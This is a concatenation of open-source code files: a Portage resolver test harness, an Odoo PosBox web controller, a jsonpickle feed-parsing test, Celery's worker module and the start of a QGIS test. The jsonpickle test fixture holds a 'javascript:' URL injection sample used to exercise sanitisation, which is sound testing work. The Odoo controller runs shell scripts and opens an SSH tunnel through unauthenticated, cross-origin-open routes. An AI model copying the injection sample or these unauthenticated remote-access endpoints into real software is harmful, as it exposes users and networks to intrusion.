parent_file = os.path.join(sub_profile_dir, "parent")
with open(parent_file, "w") as f:
f.write("..\n")
if profile:
for config_file, lines in profile.items():
if config_file not in self.config_files:
raise ValueError("Unknown config file: '%s'" % config_file)
file_name = os.path.join(sub_profile_dir, config_file)
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
#Create profile symlink
os.symlink(sub_profile_dir, os.path.join(user_config_dir, "make.profile"))
#Create minimal herds.xml
herds_xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE herds SYSTEM "http://www.gentoo.org/dtd/herds.dtd">
<?xml-stylesheet href="/xsl/herds.xsl" type="text/xsl" ?>
<?xml-stylesheet href="/xsl/guide.xsl" type="text/xsl" ?>
<herds>
<herd>
<name>base-system</name>
<email>base-system@gentoo.org</email>
<description>Core system utilities and libraries.</description>
<maintainer>
<email>base-system@gentoo.orgg</email>
<name>Base System</name>
<role>Base System Maintainer</role>
</maintainer>
</herd>
</herds>
"""
with open(os.path.join(metadata_dir, "metadata.xml"), 'w') as f:
f.write(herds_xml)
make_conf = {
"ACCEPT_KEYWORDS": "x86",
"CLEAN_DELAY": "0",
"DISTDIR" : self.distdir,
"EMERGE_WARNING_DELAY": "0",
"PKGDIR": self.pkgdir,
"PORTAGE_INST_GID": str(portage.data.portage_gid),
"PORTAGE_INST_UID": str(portage.data.portage_uid),
"PORTAGE_TMPDIR": os.path.join(self.eroot, 'var/tmp'),
}
if os.environ.get("NOCOLOR"):
make_conf["NOCOLOR"] = os.environ["NOCOLOR"]
# Pass along PORTAGE_USERNAME and PORTAGE_GRPNAME since they
# need to be inherited by ebuild subprocesses.
if 'PORTAGE_USERNAME' in os.environ:
make_conf['PORTAGE_USERNAME'] = os.environ['PORTAGE_USERNAME']
if 'PORTAGE_GRPNAME' in os.environ:
make_conf['PORTAGE_GRPNAME'] = os.environ['PORTAGE_GRPNAME']
make_conf_lines = []
for k_v in make_conf.items():
make_conf_lines.append('%s="%s"' % k_v)
if "make.conf" in user_config:
make_conf_lines.extend(user_config["make.conf"])
if not portage.process.sandbox_capable or \
os.environ.get("SANDBOX_ON") == "1":
# avoid problems from nested sandbox instances
make_conf_lines.append('FEATURES="${FEATURES} -sandbox -usersandbox"')
configs = user_config.copy()
configs["make.conf"] = make_conf_lines
for config_file, lines in configs.items():
if config_file not in self.config_files:
raise ValueError("Unknown config file: '%s'" % config_file)
file_name = os.path.join(user_config_dir, config_file)
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
#Create /usr/share/portage/config/make.globals
make_globals_path = os.path.join(self.eroot,
GLOBAL_CONFIG_PATH.lstrip(os.sep), "make.globals")
ensure_dirs(os.path.dirname(make_globals_path))
os.symlink(os.path.join(cnf_path, "make.globals"),
make_globals_path)
#Create /usr/share/portage/config/sets/portage.conf
default_sets_conf_dir = os.path.join(self.eroot, "usr/share/portage/config/sets")
try:
os.makedirs(default_sets_conf_dir)
except os.error:
pass
provided_sets_portage_conf = (
os.path.join(cnf_path, "sets", "portage.conf"))
os.symlink(provided_sets_portage_conf, os.path.join(default_sets_conf_dir, "portage.conf"))
set_config_dir = os.path.join(user_config_dir, "sets")
try:
os.makedirs(set_config_dir)
except os.error:
pass
for sets_file, lines in sets.items():
file_name = os.path.join(set_config_dir, sets_file)
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
def _create_world(self, world, world_sets):
#Create /var/lib/portage/world
var_lib_portage = os.path.join(self.eroot, "var", "lib", "portage")
os.makedirs(var_lib_portage)
world_file = os.path.join(var_lib_portage, "world")
world_set_file = os.path.join(var_lib_portage, "world_sets")
with open(world_file, "w") as f:
for atom in world:
f.write("%s\n" % atom)
with open(world_set_file, "w") as f:
for atom in world_sets:
f.write("%s\n" % atom)
def _load_config(self):
create_trees_kwargs = {}
if self.target_root != os.sep:
create_trees_kwargs["target_root"] = self.target_root
env = {
"PORTAGE_REPOSITORIES": "\n".join("[%s]\n%s" % (repo_name, "\n".join("%s = %s" % (k, v) for k, v in repo_config.items())) for repo_name, repo_config in self._repositories.items())
}
trees = portage.create_trees(env=env, eprefix=self.eprefix,
**create_trees_kwargs)
for root, root_trees in trees.items():
settings = root_trees["vartree"].settings
settings._init_dirs()
setconfig = load_default_config(settings, root_trees)
root_trees["root_config"] = RootConfig(settings, root_trees, setconfig)
return trees[trees._target_eroot]["vartree"].settings, trees
def run(self, atoms, options={}, action=None):
options = options.copy()
options["--pretend"] = True
if self.debug:
options["--debug"] = True
if action is None:
if options.get("--depclean"):
action = "depclean"
elif options.get("--prune"):
action = "prune"
if "--usepkgonly" in options:
options["--usepkg"] = True
global_noiselimit = portage.util.noiselimit
global_emergelog_disable = _emerge.emergelog._disable
try:
if not self.debug:
portage.util.noiselimit = -2
_emerge.emergelog._disable = True
if action in ("depclean", "prune"):
rval, cleanlist, ordered, req_pkg_count = \
calc_depclean(self.settings, self.trees, None,
options, action, InternalPackageSet(initial_atoms=atoms, allow_wildcard=True), None)
result = ResolverPlaygroundDepcleanResult(
atoms, rval, cleanlist, ordered, req_pkg_count)
else:
params = create_depgraph_params(options, action)
success, depgraph, favorites = backtrack_depgraph(
self.settings, self.trees, options, params, action, atoms, None)
depgraph._show_merge_list()
depgraph.display_problems()
result = ResolverPlaygroundResult(atoms, success, depgraph, favorites)
finally:
portage.util.noiselimit = global_noiselimit
_emerge.emergelog._disable = global_emergelog_disable
return result
def run_TestCase(self, test_case):
if not isinstance(test_case, ResolverPlaygroundTestCase):
raise TypeError("ResolverPlayground needs a ResolverPlaygroundTestCase")
for atoms in test_case.requests:
result = self.run(atoms, test_case.options, test_case.action)
if not test_case.compare_with_result(result):
return
def cleanup(self):
for eroot in self.trees:
portdb = self.trees[eroot]["porttree"].dbapi
portdb.close_caches()
if self.debug:
print("\nEROOT=%s" % self.eroot)
else:
shutil.rmtree(self.eroot)
class ResolverPlaygroundTestCase(object):
def __init__(self, request, **kwargs):
self.all_permutations = kwargs.pop("all_permutations", False)
self.ignore_mergelist_order = kwargs.pop("ignore_mergelist_order", False)
self.ambiguous_merge_order = kwargs.pop("ambiguous_merge_order", False)
self.ambiguous_slot_collision_solutions = kwargs.pop("ambiguous_slot_collision_solutions", False)
self.check_repo_names = kwargs.pop("check_repo_names", False)
self.merge_order_assertions = kwargs.pop("merge_order_assertions", False)
if self.all_permutations:
self.requests = list(permutations(request))
else:
self.requests = [request]
self.options = kwargs.pop("options", {})
self.action = kwargs.pop("action", None)
self.test_success = True
self.fail_msg = None
self._checks = kwargs.copy()
def compare_with_result(self, result):
checks = dict.fromkeys(result.checks)
for key, value in self._checks.items():
if not key in checks:
raise KeyError("Not an available check: '%s'" % key)
checks[key] = value
fail_msgs = []
for key, value in checks.items():
got = getattr(result, key)
expected = value
if key in result.optional_checks and expected is None:
continue
if key == "mergelist":
if not self.check_repo_names:
#Strip repo names if we don't check them
if got:
new_got = []
for cpv in got:
if cpv[:1] == "!":
new_got.append(cpv)
continue
new_got.append(cpv.split(_repo_separator)[0])
got = new_got
if expected:
new_expected = []
for obj in expected:
if isinstance(obj, basestring):
if obj[:1] == "!":
new_expected.append(obj)
continue
new_expected.append(
obj.split(_repo_separator)[0])
continue
new_expected.append(set())
for cpv in obj:
if cpv[:1] != "!":
cpv = cpv.split(_repo_separator)[0]
new_expected[-1].add(cpv)
expected = new_expected
if self.ignore_mergelist_order and got is not None:
got = set(got)
expected = set(expected)
if self.ambiguous_merge_order and got:
expected_stack = list(reversed(expected))
got_stack = list(reversed(got))
new_expected = []
match = True
while got_stack and expected_stack:
got_token = got_stack.pop()
expected_obj = expected_stack.pop()
if isinstance(expected_obj, basestring):
new_expected.append(expected_obj)
if got_token == expected_obj:
continue
# result doesn't match, so stop early
match = False
break
expected_obj = set(expected_obj)
try:
expected_obj.remove(got_token)
except KeyError:
# result doesn't match, so stop early
match = False
break
new_expected.append(got_token)
while got_stack and expected_obj:
got_token = got_stack.pop()
try:
expected_obj.remove(got_token)
except KeyError:
match = False
break
new_expected.append(got_token)
if not match:
# result doesn't match, so stop early
break
if expected_obj:
# result does not match, so stop early
match = False
new_expected.append(tuple(expected_obj))
break
if expected_stack:
# result does not match, add leftovers to new_expected
match = False
expected_stack.reverse()
new_expected.extend(expected_stack)
expected = new_expected
if match and self.merge_order_assertions:
for node1, node2 in self.merge_order_assertions:
if not (got.index(node1) < got.index(node2)):
fail_msgs.append("atoms: (" + \
", ".join(result.atoms) + "), key: " + \
("merge_order_assertions, expected: %s" % \
str((node1, node2))) + \
", got: " + str(got))
elif key == "slot_collision_solutions" and \
self.ambiguous_slot_collision_solutions:
# Tests that use all_permutations can have multiple
# outcomes here.
for x in expected:
if x == got:
expected = x
break
elif key in ("unstable_keywords", "needed_p_mask_changes",
"unsatisfied_deps", "required_use_unsatisfied") and \
expected is not None:
expected = set(expected)
elif key == "forced_rebuilds" and expected is not None:
expected = dict((k, set(v)) for k, v in expected.items())
if got != expected:
fail_msgs.append("atoms: (" + ", ".join(result.atoms) + "), key: " + \
key + ", expected: " + str(expected) + ", got: " + str(got))
if fail_msgs:
self.test_success = False
self.fail_msg = "\n".join(fail_msgs)
return False
return True
class ResolverPlaygroundResult(object):
checks = (
"success", "mergelist", "use_changes", "license_changes",
"unstable_keywords", "slot_collision_solutions",
"circular_dependency_solutions", "needed_p_mask_changes",
"unsatisfied_deps", "forced_rebuilds", "required_use_unsatisfied"
)
optional_checks = (
"forced_rebuilds",
"required_use_unsatisfied",
"unsatisfied_deps"
)
def __init__(self, atoms, success, mydepgraph, favorites):
self.atoms = atoms
self.success = success
self.depgraph = mydepgraph
self.favorites = favorites
self.mergelist = None
self.use_changes = None
self.license_changes = None
self.unstable_keywords = None
self.needed_p_mask_changes = None
self.slot_collision_solutions = None
self.circular_dependency_solutions = None
self.unsatisfied_deps = frozenset()
self.forced_rebuilds = None
self.required_use_unsatisfied = None
if self.depgraph._dynamic_config._serialized_tasks_cache is not None:
self.mergelist = []
host_root = self.depgraph._frozen_config._running_root.root
for x in self.depgraph._dynamic_config._serialized_tasks_cache:
if isinstance(x, Blocker):
self.mergelist.append(x.atom)
else:
repo_str = ""
if x.repo != "test_repo":
repo_str = _repo_separator + x.repo
build_id_str = ""
if (x.type_name == "binary" and
x.cpv.build_id is not None):
build_id_str = "-%s" % x.cpv.build_id
mergelist_str = x.cpv + build_id_str + repo_str
if x.built:
if x.operation == "merge":
desc = x.type_name
else:
desc = x.operation
mergelist_str = "[%s]%s" % (desc, mergelist_str)
if x.root != host_root:
mergelist_str += "{targetroot}"
self.mergelist.append(mergelist_str)
if self.depgraph._dynamic_config._needed_use_config_changes:
self.use_changes = {}
for pkg, needed_use_config_changes in \
self.depgraph._dynamic_config._needed_use_config_changes.items():
new_use, changes = needed_use_config_changes
self.use_changes[pkg.cpv] = changes
if self.depgraph._dynamic_config._needed_unstable_keywords:
self.unstable_keywords = set()
for pkg in self.depgraph._dynamic_config._needed_unstable_keywords:
self.unstable_keywords.add(pkg.cpv)
if self.depgraph._dynamic_config._needed_p_mask_changes:
self.needed_p_mask_changes = set()
for pkg in self.depgraph._dynamic_config._needed_p_mask_changes:
self.needed_p_mask_changes.add(pkg.cpv)
if self.depgraph._dynamic_config._needed_license_changes:
self.license_changes = {}
for pkg, missing_licenses in self.depgraph._dynamic_config._needed_license_changes.items():
self.license_changes[pkg.cpv] = missing_licenses
if self.depgraph._dynamic_config._slot_conflict_handler is not None:
self.slot_collision_solutions = []
handler = self.depgraph._dynamic_config._slot_conflict_handler
for change in handler.changes:
new_change = {}
for pkg in change:
new_change[pkg.cpv] = change[pkg]
self.slot_collision_solutions.append(new_change)
if self.depgraph._dynamic_config._circular_dependency_handler is not None:
handler = self.depgraph._dynamic_config._circular_dependency_handler
sol = handler.solutions
self.circular_dependency_solutions = dict(zip([x.cpv for x in sol.keys()], sol.values()))
if self.depgraph._dynamic_config._unsatisfied_deps_for_display:
self.unsatisfied_deps = set(dep_info[0][1]
for dep_info in self.depgraph._dynamic_config._unsatisfied_deps_for_display)
if self.depgraph._forced_rebuilds:
self.forced_rebuilds = dict(
(child.cpv, set(parent.cpv for parent in parents))
for child_dict in self.depgraph._forced_rebuilds.values()
for child, parents in child_dict.items())
required_use_unsatisfied = []
for pargs, kwargs in \
self.depgraph._dynamic_config._unsatisfied_deps_for_display:
if "show_req_use" in kwargs:
required_use_unsatisfied.append(pargs[1])
if required_use_unsatisfied:
self.required_use_unsatisfied = set(required_use_unsatisfied)
class ResolverPlaygroundDepcleanResult(object):
checks = (
"success", "cleanlist", "ordered", "req_pkg_count",
)
optional_checks = (
"ordered", "req_pkg_count",
)
def __init__(self, atoms, rval, cleanlist, ordered, req_pkg_count):
self.atoms = atoms
self.success = rval == 0
self.cleanlist = cleanlist
self.ordered = ordered
self.req_pkg_count = req_pkg_count
| gpl-2.0 |
ChawalitK/odoo | addons/hw_posbox_homepage/controllers/main.py | 1 | 8247 | # -*- coding: utf-8 -*-
import logging
import os
import time
import werkzeug
import subprocess
from os import listdir
import openerp
from openerp import http
from openerp.http import request
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
index_style = """
<style>
body {
width: 480px;
margin: 60px auto;
font-family: sans-serif;
text-align: justify;
color: #6B6B6B;
}
.text-red {
color: #FF0000;
}
</style>
"""
index_template = """
<!DOCTYPE HTML>
<html>
<head>
<title>Odoo's PosBox</title>
""" + index_style + """
</head>
<body>
<h1>Your PosBox is up and running</h1>
<p>
The PosBox is an hardware adapter that allows you to use
receipt printers and barcode scanners with Odoo's Point of
Sale, <b>version 8.0 or later</b>. You can start an <a href='https://www.odoo.com/start'>online free trial</a>,
or <a href='https://www.odoo.com/start?download'>download and install</a> it yourself.
</p>
<p>
For more information on how to setup the Point of Sale with
the PosBox, please refer to
<a href='https://www.odoo.com/documentation/user/point_of_sale/posbox/index.html'>the manual</a>.
</p>
<p>
To see the status of the connected hardware, please refer
to the <a href='/hw_proxy/status'>hardware status page</a>.
</p>
<p>
Wi-Fi can be configured by visiting the <a href='/wifi'>Wi-Fi configuration page</a>.
</p>
<p>
The PosBox software installed on this posbox is <b>version 14</b>,
the posbox version number is independent from Odoo. You can upgrade
the software on the <a href='/hw_proxy/upgrade/'>upgrade page</a>.
</p>
<p>For any other question, please contact the Odoo support at <a href='mailto:help@odoo.com'>help@odoo.com</a>
</p>
</body>
</html>
"""
class PosboxHomepage(openerp.addons.web.controllers.main.Home):
@http.route('/', type='http', auth='none', website=True)
def index(self):
#return request.render('hw_posbox_homepage.index',mimetype='text/html')
return index_template
@http.route('/wifi', type='http', auth='none', website=True)
def wifi(self):
wifi_template = """
<!DOCTYPE HTML>
<html>
<head>
<title>Wifi configuration</title>
""" + index_style + """
</head>
<body>
<h1>Configure wifi</h1>
<p>
Here you can configure how the posbox should connect to wireless networks.
Currently only Open and WPA networks are supported. When enabling the persistent checkbox,
the chosen network will be saved and the posbox will attempt to connect to it every time it boots.
</p>
<form action='/wifi_connect' method='POST'>
<table>
<tr>
<td>
ESSID:
</td>
<td>
<select name="essid">
"""
try:
f = open('/tmp/scanned_networks.txt', 'r')
for line in f:
line = line.rstrip()
line = werkzeug.utils.escape(line)
wifi_template += '<option value="' + line + '">' + line + '</option>\n'
f.close()
except IOError:
_logger.warning("No /tmp/scanned_networks.txt")
wifi_template += """
</select>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" name="password" placeholder="optional"/>
</td>
</tr>
<tr>
<td>
Persistent:
</td>
<td>
<input type="checkbox" name="persistent"/>
</td>
</tr>
<tr>
<td/>
<td>
<input type="submit" value="connect"/>
</td>
</tr>
</table>
</form>
<p>
You can clear the persistent configuration by clicking below:
<form action='/wifi_clear'>
<input type="submit" value="Clear persistent network configuration"/>
</form>
</p>
<form>
</body>
</html>
"""
return wifi_template
@http.route('/wifi_connect', type='http', auth='none', cors='*')
def connect_to_wifi(self, essid, password, persistent=False):
if persistent:
persistent = "1"
else:
persistent = ""
subprocess.call(['/home/pi/odoo/addons/point_of_sale/tools/posbox/configuration/connect_to_wifi.sh', essid, password, persistent])
return "connecting to " + essid
@http.route('/wifi_clear', type='http', auth='none', cors='*')
def clear_wifi_configuration(self):
os.system('/home/pi/odoo/addons/point_of_sale/tools/posbox/configuration/clear_wifi_configuration.sh')
return "configuration cleared"
@http.route('/remote_connect', type='http', auth='none', cors='*')
def remote_connect(self):
ngrok_template = """
<!DOCTYPE HTML>
<html>
<head>
<title>Remote debugging</title>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
$(function () {
var upgrading = false;
$('#enable_debug').click(function () {
var auth_token = $('#auth_token').val();
if (auth_token == "") {
alert('Please provide an authentication token.');
} else {
$.ajax({
url: '/enable_ngrok',
data: {
'auth_token': auth_token
}
}).always(function (response) {
if (response === 'already running') {
alert('Remote debugging already activated.');
} else {
$('#auth_token').attr('disabled','disabled');
$('#enable_debug').html('Enabled remote debugging');
$('#enable_debug').removeAttr('href', '')
$('#enable_debug').off('click');
}
});
}
});
});
</script>
""" + index_style + """
<style>
#enable_debug {
padding: 10px;
background: rgb(121, 197, 107);
color: white;
border-radius: 3px;
text-align: center;
margin: 30px;
text-decoration: none;
display: inline-block;
}
.centering{
text-align: center;
}
</style>
</head>
<body>
<h1>Remote debugging</h1>
<p class='text-red'>
This allows someone to gain remote access to your Posbox, and
thus your entire local network. Only enable this for someone
you trust.
</p>
<div class='centering'>
<input type="text" id="auth_token" size="42" placeholder="Authentication Token"/> <br/>
<a id="enable_debug" href="#">Enable remote debugging</a>
</div>
</body>
</html>
"""
return ngrok_template
@http.route('/enable_ngrok', type='http', auth='none', cors='*')
def enable_ngrok(self, auth_token):
if subprocess.call(['pgrep', 'ngrok']) == 1:
subprocess.Popen(['ngrok', 'tcp', '-authtoken', auth_token, '-log', '/tmp/ngrok.log', '22'])
return 'starting with ' + auth_token
else:
return 'already running'
| gpl-3.0 |
FrankBian/kuma | vendor/packages/jsonpickle/tests/thirdparty_tests.py | 5 | 2876 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
import unittest
import jsonpickle
RSS_DOC = """<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:base="http://example.org/" xml:lang="en">
<title type="text">Sample Feed</title>
<subtitle type="html">For documentation <em>only</em></subtitle>
<link rel="alternate" type="html" href="/"/>
<link rel="self" type="application/atom+xml" href="http://www.example.org/atom10.xml"/>
<rights type="html"><p>Copyright 2005, Mark Pilgrim</p><</rights>
<generator uri="http://example.org/generator/" version="4.0">Sample Toolkit</generator>
<id>tag:feedparser.org,2005-11-09:/docs/examples/atom10.xml</id>
<updated>2005-11-09T11:56:34Z</updated>
<entry>
<title>First entry title</title>
<link rel="alternate" href="/entry/3"/>
<link rel="related" type="text/html" href="http://search.example.com/"/>
<link rel="via" type="text/html" href="http://toby.example.com/examples/atom10"/>
<link rel="enclosure" type="video/mpeg4" href="http://www.example.com/movie.mp4" length="42301"/>
<id>tag:feedparser.org,2005-11-09:/docs/examples/atom10.xml:3</id>
<published>2005-11-09T00:23:47Z</published>
<updated>2005-11-09T11:56:34Z</updated>
<author>
<name>Mark Pilgrim</name>
<uri>http://diveintomark.org/</uri>
<email>mark@example.org</email>
</author>
<contributor>
<name>Joe</name>
<uri>http://example.org/joe/</uri>
<email>joe@example.org</email>
</contributor>
<contributor>
<name>Sam</name>
<uri>http://example.org/sam/</uri>
<email>sam@example.org</email>
</contributor>
<summary type="text">Watch out for nasty tricks</summary>
<content type="xhtml" xml:base="http://example.org/entry/3" xml:lang="en-US">
<div xmlns="http://www.w3.org/1999/xhtml">Watch out for <span style="background: url(javascript:window.location='http://example.org/')"> nasty tricks</span></div>
</content>
</entry>
</feed>"""
class FeedParserTest(unittest.TestCase):
def setUp(self):
try:
import feedparser
except ImportError, e:
self.fail("feedparser module not available, please install")
self.doc = feedparser.parse(RSS_DOC)
def test(self):
pickled = jsonpickle.encode(self.doc)
unpickled = jsonpickle.decode(pickled)
self.assertEquals(self.doc['feed']['title'], unpickled['feed']['title'])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(FeedParserTest, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| mpl-2.0 |
campbe13/openhatch | vendor/packages/celery/celery/worker/__init__.py | 18 | 12962 | # -*- coding: utf-8 -*-
"""
celery.worker
~~~~~~~~~~~~~
The worker.
:copyright: (c) 2009 - 2011 by Ask Solem.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import atexit
import logging
import socket
import sys
import threading
import traceback
from kombu.utils.finalize import Finalize
from .. import beat
from .. import concurrency as _concurrency
from .. import registry, platforms, signals
from ..app import app_or_default
from ..exceptions import SystemTerminate
from ..log import SilenceRepeated
from ..utils import noop, instantiate
from . import state
from .buckets import TaskBucket, FastQueue
RUN = 0x1
CLOSE = 0x2
TERMINATE = 0x3
#: List of signals to reset when a child process starts.
WORKER_SIGRESET = frozenset(["SIGTERM",
"SIGHUP",
"SIGTTIN",
"SIGTTOU",
"SIGUSR1"])
#: List of signals to ignore when a child process starts.
WORKER_SIGIGNORE = frozenset(["SIGINT"])
def process_initializer(app, hostname):
"""Initializes the process so it can be used to process tasks.
Used for multiprocessing environments.
"""
app = app_or_default(app)
app.set_current()
platforms.signals.reset(*WORKER_SIGRESET)
platforms.signals.ignore(*WORKER_SIGIGNORE)
platforms.set_mp_process_title("celeryd", hostname=hostname)
# This is for Windows and other platforms not supporting
# fork(). Note that init_worker makes sure it's only
# run once per process.
app.loader.init_worker()
app.loader.init_worker_process()
signals.worker_process_init.send(sender=None)
class WorkController(object):
"""Unmanaged worker instance."""
RUN = RUN
CLOSE = CLOSE
TERMINATE = TERMINATE
#: The number of simultaneous processes doing work (default:
#: :setting:`CELERYD_CONCURRENCY`)
concurrency = None
#: The loglevel used (default: :const:`logging.INFO`)
loglevel = logging.ERROR
#: The logfile used, if no logfile is specified it uses `stderr`
#: (default: :setting:`CELERYD_LOG_FILE`).
logfile = None
#: If :const:`True`, celerybeat is embedded, running in the main worker
#: process as a thread.
embed_clockservice = None
#: Enable the sending of monitoring events, these events can be captured
#: by monitors (celerymon).
send_events = False
#: The :class:`logging.Logger` instance used for logging.
logger = None
#: The pool instance used.
pool = None
#: The internal queue object that holds tasks ready for immediate
#: processing.
ready_queue = None
#: Instance of :class:`celery.worker.mediator.Mediator`.
mediator = None
#: Consumer instance.
consumer = None
_state = None
_running = 0
def __init__(self, concurrency=None, logfile=None, loglevel=None,
send_events=None, hostname=None, ready_callback=noop,
embed_clockservice=False, pool_cls=None, consumer_cls=None,
mediator_cls=None, eta_scheduler_cls=None,
schedule_filename=None, task_time_limit=None,
task_soft_time_limit=None, max_tasks_per_child=None,
pool_putlocks=None, db=None, prefetch_multiplier=None,
eta_scheduler_precision=None, disable_rate_limits=None,
autoscale=None, autoscaler_cls=None, scheduler_cls=None,
app=None):
self.app = app_or_default(app)
conf = self.app.conf
self._shutdown_complete = threading.Event()
# Options
self.loglevel = loglevel or self.loglevel
self.concurrency = concurrency or conf.CELERYD_CONCURRENCY
self.logfile = logfile or conf.CELERYD_LOG_FILE
self.logger = self.app.log.get_default_logger()
if send_events is None:
send_events = conf.CELERY_SEND_EVENTS
self.send_events = send_events
self.pool_cls = _concurrency.get_implementation(
pool_cls or conf.CELERYD_POOL)
self.consumer_cls = consumer_cls or conf.CELERYD_CONSUMER
self.mediator_cls = mediator_cls or conf.CELERYD_MEDIATOR
self.eta_scheduler_cls = eta_scheduler_cls or \
conf.CELERYD_ETA_SCHEDULER
self.autoscaler_cls = autoscaler_cls or \
conf.CELERYD_AUTOSCALER
self.schedule_filename = schedule_filename or \
conf.CELERYBEAT_SCHEDULE_FILENAME
self.scheduler_cls = scheduler_cls or conf.CELERYBEAT_SCHEDULER
self.hostname = hostname or socket.gethostname()
self.embed_clockservice = embed_clockservice
self.ready_callback = ready_callback
self.task_time_limit = task_time_limit or \
conf.CELERYD_TASK_TIME_LIMIT
self.task_soft_time_limit = task_soft_time_limit or \
conf.CELERYD_TASK_SOFT_TIME_LIMIT
self.max_tasks_per_child = max_tasks_per_child or \
conf.CELERYD_MAX_TASKS_PER_CHILD
self.pool_putlocks = pool_putlocks or \
conf.CELERYD_POOL_PUTLOCKS
self.eta_scheduler_precision = eta_scheduler_precision or \
conf.CELERYD_ETA_SCHEDULER_PRECISION
self.prefetch_multiplier = prefetch_multiplier or \
conf.CELERYD_PREFETCH_MULTIPLIER
self.timer_debug = SilenceRepeated(self.logger.debug,
max_iterations=10)
self.db = db or conf.CELERYD_STATE_DB
self.disable_rate_limits = disable_rate_limits or \
conf.CELERY_DISABLE_RATE_LIMITS
self._finalize = Finalize(self, self.stop, exitpriority=1)
self._finalize_db = None
if self.db:
self._persistence = state.Persistent(self.db)
atexit.register(self._persistence.save)
# Queues
if not self.pool_cls.rlimit_safe:
self.disable_rate_limits = True
if self.disable_rate_limits:
self.ready_queue = FastQueue()
self.ready_queue.put = self.process_task
else:
self.ready_queue = TaskBucket(task_registry=registry.tasks)
self.logger.debug("Instantiating thread components...")
# Threads + Pool + Consumer
self.autoscaler = None
max_concurrency = None
min_concurrency = concurrency
if autoscale:
max_concurrency, min_concurrency = autoscale
self.pool = instantiate(self.pool_cls, min_concurrency,
logger=self.logger,
initializer=process_initializer,
initargs=(self.app, self.hostname),
maxtasksperchild=self.max_tasks_per_child,
timeout=self.task_time_limit,
soft_timeout=self.task_soft_time_limit,
putlocks=self.pool_putlocks)
self.priority_timer = instantiate(self.pool.Timer)
if not self.eta_scheduler_cls:
# Default Timer is set by the pool, as e.g. eventlet
# needs a custom implementation.
self.eta_scheduler_cls = self.pool.Timer
self.autoscaler = None
if autoscale:
self.autoscaler = instantiate(self.autoscaler_cls, self.pool,
max_concurrency=max_concurrency,
min_concurrency=min_concurrency,
logger=self.logger)
self.mediator = None
if not self.disable_rate_limits:
self.mediator = instantiate(self.mediator_cls, self.ready_queue,
app=self.app,
callback=self.process_task,
logger=self.logger)
self.scheduler = instantiate(self.eta_scheduler_cls,
precision=eta_scheduler_precision,
on_error=self.on_timer_error,
on_tick=self.on_timer_tick)
self.beat = None
if self.embed_clockservice:
self.beat = beat.EmbeddedService(app=self.app,
logger=self.logger,
schedule_filename=self.schedule_filename,
scheduler_cls=self.scheduler_cls)
prefetch_count = self.concurrency * self.prefetch_multiplier
self.consumer = instantiate(self.consumer_cls,
self.ready_queue,
self.scheduler,
logger=self.logger,
hostname=self.hostname,
send_events=self.send_events,
init_callback=self.ready_callback,
initial_prefetch_count=prefetch_count,
pool=self.pool,
priority_timer=self.priority_timer,
app=self.app,
controller=self)
# The order is important here;
# the first in the list is the first to start,
# and they must be stopped in reverse order.
self.components = filter(None, (self.pool,
self.mediator,
self.scheduler,
self.beat,
self.autoscaler,
self.consumer))
def start(self):
"""Starts the workers main loop."""
self._state = self.RUN
try:
for i, component in enumerate(self.components):
self.logger.debug("Starting thread %s...",
component.__class__.__name__)
self._running = i + 1
component.start()
except SystemTerminate:
self.terminate()
except Exception, exc:
self.logger.error("Unrecoverable error: %r" % (exc, ),
exc_info=sys.exc_info())
self.stop()
except (KeyboardInterrupt, SystemExit):
self.stop()
# Will only get here if running green,
# makes sure all greenthreads have exited.
self._shutdown_complete.wait()
def process_task(self, request):
"""Process task by sending it to the pool of workers."""
try:
request.task.execute(request, self.pool,
self.loglevel, self.logfile)
except Exception, exc:
self.logger.critical("Internal error %s: %s\n%s",
exc.__class__, exc, traceback.format_exc(),
exc_info=True)
except SystemTerminate:
self.terminate()
raise
except BaseException, exc:
self.stop()
raise exc
def stop(self, in_sighandler=False):
"""Graceful shutdown of the worker server."""
if not in_sighandler or self.pool.signal_safe:
self._shutdown(warm=True)
def terminate(self, in_sighandler=False):
"""Not so graceful shutdown of the worker server."""
if not in_sighandler or self.pool.signal_safe:
self._shutdown(warm=False)
def _shutdown(self, warm=True):
what = (warm and "stopping" or "terminating").capitalize()
if self._state in (self.CLOSE, self.TERMINATE):
return
if self._state != self.RUN or self._running != len(self.components):
# Not fully started, can safely exit.
self._state = self.TERMINATE
self._shutdown_complete.set()
return
self._state = self.CLOSE
signals.worker_shutdown.send(sender=self)
for component in reversed(self.components):
self.logger.debug("%s thread %s...", what,
component.__class__.__name__)
stop = component.stop
if not warm:
stop = getattr(component, "terminate", None) or stop
stop()
self.priority_timer.stop()
self.consumer.close_connection()
self._state = self.TERMINATE
self._shutdown_complete.set()
def on_timer_error(self, exc_info):
_, exc, _ = exc_info
self.logger.error("Timer error: %r", exc, exc_info=exc_info)
def on_timer_tick(self, delay):
self.timer_debug("Scheduler wake-up! Next eta %s secs." % delay)
| agpl-3.0 |
t-hey/QGIS-Original | tests/src/python/test_qgsvectorfilewriter.py | 2 | 35947 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsVectorFileWriter.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import next
from builtins import str
__author__ = 'Tim Sutton'
__date__ = '20/08/2012'
__copyright__ = 'Copyright 2012, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
from qgis.core import (QgsVectorLayer,
QgsFeature,
QgsField,
QgsGeometry,
QgsPointXY,
QgsCoordinateReferenceSystem,
QgsVectorFileWriter,
QgsFeatureRequest,
QgsWkbTypes,
QgsRectangle,
QgsCoordinateTransform
)
from qgis.PyQt.QtCore import QDate, QTime, QDateTime, QVariant, QDir
import os
import osgeo.gdal # NOQA
